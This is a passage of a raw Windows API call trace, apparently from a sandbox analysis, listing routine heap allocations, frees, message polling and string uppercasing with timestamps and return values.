[0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.247] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.247] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.249] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0261.249] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.249] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0261.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.250] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0261.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0261.253] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.254] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.256] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.257] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0261.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0261.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0261.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.261] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.262] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.262] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: 